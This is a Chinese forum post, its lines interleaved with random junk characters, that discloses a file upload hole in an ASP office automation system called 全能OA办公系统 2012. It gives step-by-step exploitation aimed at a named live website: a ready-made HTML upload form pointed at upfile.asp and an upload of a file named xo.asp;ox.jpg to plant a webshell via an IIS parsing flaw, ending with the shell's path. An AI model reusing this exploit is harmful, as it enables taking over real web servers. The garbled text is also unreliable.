全能OA办公系统 上传漏洞
5 ?/ C1 a+ A5 z g
- N( Z0 u9 h# \' D- a& y7 ^系统介绍:3 J2 B5 t% ` e
1 v3 Z$ D4 l% q全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 c4 a9 k2 ?6 z4 O
& v9 N% v# W! L+ K, T" S主要功能:
! j5 t u; |% P1 f# @4 y5 \5 y( s公司通告
8 f* B) H# k$ T' w" d& H+ f/ S( Y( H8 _工作计划
( V' p0 A, f: [3 _+ z通讯助理
5 h/ j [, R2 Q( {# v, A/ f客户资源 2 {) x2 v W1 @/ K _! I: A$ }; o
我的公文
5 G2 v3 J5 N/ G* N$ [- n公文传阅
8 ~. k h" v/ W3 B' m V' p公共资源 7 C' h+ F$ d7 ~1 I
资源预约
# P4 r6 p7 ?. G& o; O1 Y3 b! o今日考勤 7 x% j5 Z" D/ s6 ]/ o/ Z
个人计划
5 Q N# S* d2 n! b/ E个人通讯录 0 K# {1 r d% G' X
个人基本档案
6 p3 J( M- N/ ?. T! f& l; S: Z未读邮件
' E2 F3 m0 z7 h/ n8 N发邮件
/ N( I3 x' D7 z: K' S5 w收件夹
+ }" H, ~$ p j$ G& h+ i寄件夹 7 J' U! v: @6 M' C/ @! Q
网络硬盘 ) F9 G/ p9 l3 q' b0 B& y
网络会议 - p' @) T& S5 D+ s! z
网络调查
% T1 r% d5 w* j+ b交流论坛
& k% i) m: h( H0 b' e: P0 M3 c$ ~% D. L5 V2 N5 Z+ y" |! S
有兴趣测试的朋友可以下源码看看
1 R$ b# Z9 ^6 m0 q
F# a U$ w& m3 t源码下载:% u3 \ O2 f9 G2 v- o5 Y$ ^2 F
7 K0 @* v/ N) S) B+ h/ F+ A4 V6 Bhttp://www.mycodes.net/30/4750.htm
- m2 p+ H2 u( ?' W' N2 _# l7 D
( I, U E4 h# z: `+ Z漏洞介绍:2 X- B3 O( A5 R
' W" O0 q$ b* x9 W" a4 [
由upfile.asp上传文件漏洞引起7 d3 D+ r4 F) P4 g3 |
, v. y. W V1 o7 S& S( U3 }, r测试方法:& M) [! O$ Q. B" q( O
# S/ q% P2 Y3 g1 d6 X8 @' k使用名小子上传http://www.itlynn.com/upfile.asp即可
" \* m# `/ t8 i/ [+ ~
; ]) H8 v; B% P( R9 s3 h如果upfile.asp文件被删除不存在。/ l2 R4 z1 s- `1 a6 w" e' |
+ i! h4 @, Q; k4 U. T) \ G 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
: K: v% C. q, @5 b6 K
; m# C( b1 \9 H5 f如果存在那么将如下代码保存为upfile.html。% L% O7 U, |5 d. a& R$ @) t9 h
" ^) S1 f! K9 J1 H2 V然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。2 q9 g0 _1 R* {. ?: f
/ [, @/ u0 w0 P) `, J( E
5 x ^+ f( `. O- X
: @& J0 }: y4 i01 <table border='0' align="center" cellpadding="5">
1 y/ m6 Q/ |, [# m- Z! |8 ]$ }# S; B2 V! v8 S& q" q: k' J2 r K; i% G
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> & w" o+ \' X% |8 J
% r9 K/ U- V% Q2 K0 x r5 I3 U03 <tr>
" D q" a. {& I c6 R% N! O
. \8 m% t, m. T" V) n0 g5 k* V9 P04 <td>报错:</td> % z( }/ |9 H8 M# z; K5 k" {, y
6 y/ F8 N" f B* P; c7 U05 <td><input type='radio' name='errnumber' value='0'> 8 ]3 ?+ Q, G6 V' A- q) E" k
: t4 u- p7 R- s2 U) a06 自动更名
2 x( R& T( o/ z4 g! Q+ `0 A5 }. s
07 <input type='radio' name='errnumber' value='1' checked>
. \- @: U3 N' c% ]! q" r! s5 N g8 e: J; A( A
08 报错方式
5 B2 I* `5 T# c" N" Z, ~, ], h
3 }" ~0 Q8 x; l* a0 ] |09 <input type='radio' name='errnumber' value='2'> 9 S0 b: l+ w1 ?: Z. [2 b5 f
# L9 A2 v5 ?5 b) q b+ y& Q10 直接覆盖</td> 8 `1 I! U$ Z C. R
: Y/ y! k3 u( k) J& |/ o. `11 </tr>
. @$ w6 U1 c% f8 j+ B, y
9 z$ y* L8 | M12 <tr>
& B3 l* P. L$ M% T, ?5 c6 G& n6 g! s9 G# H. H6 p
13 <td>主题:</td>
( J3 F9 g5 U- G, d4 T/ k
" g9 H w2 i5 u; W# P14 <td><input type='text' name='filename' size='30'></td> 4 E B' ^+ _: B9 { _- l
$ }2 X* @& a3 B; _: @
15 </tr> 4 V' e3 s/ z- s# J
4 [- v# L6 A" F# ]
16 <tr> / d- x# C: u1 h7 W0 z* O: {8 `
6 w! c, b- Z9 v4 m; _+ H
17 <td>文件:</td> 8 @% h# b) M ~! S
: N) d4 [* d) G5 k! X7 _5 I18 <td><input type="file"name="fruit"size="30"></td> 5 G9 I& N( \3 N2 h0 h0 b
& a0 G1 x ~" K19 </tr>
4 a/ m! R* @6 O" D& Z+ D8 R
3 j3 b2 p" y, \ w( q" G0 E20 <tr>
0 S3 T+ q5 R0 r' j
! S3 J& Q7 p2 K+ t5 \2 I: N' l21 <td valign='top'>简介:</td> ( F2 o, ^3 I' g1 e
4 f" h. Q$ b# [( M" {
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> . ^ q* F. Y' t4 X- p4 t
- N. J7 p& ?5 F7 b" K4 R3 `
23 </tr>
/ F) R1 D( e/ _; g1 Y7 p2 j; I* k/ E1 `; m- e, G* k3 L3 ?
24 . r1 Y: b3 X+ H3 J& t
; [0 R) @* C8 L4 Y' v, Z
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
Z0 `; i* ~! Y% ?8 [2 \* Y
* f. Q" q* K0 N4 E: X3 a% }26 </tr>
( ^( F1 f) S$ A' L" J ?, ` X* @" I4 h) G+ m
27 </form> ! j" e$ }0 ]' Z# }
* x* U1 Z% C, N8 O: L
然后打开上传一个文件名为xo.asp;ox.jpg的文件。$ R+ f7 d+ e# s
" K/ S7 r4 x* T0 h1 u) J- i; e4 r 9 b* K, h6 e: n4 L7 U
+ Z( a' d" v0 K6 s) T/ h0 l$ ~上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg, N/ V D. i" {" [& l3 s0 Z
8 C$ {0 f2 f# G( m! W2 \
此漏洞需要配合解析漏洞利用。
3 d9 j! n. G9 N* ?7 K3 R: V; `. _, `
- f7 S6 c$ O$ N& S0 f/ n* _ |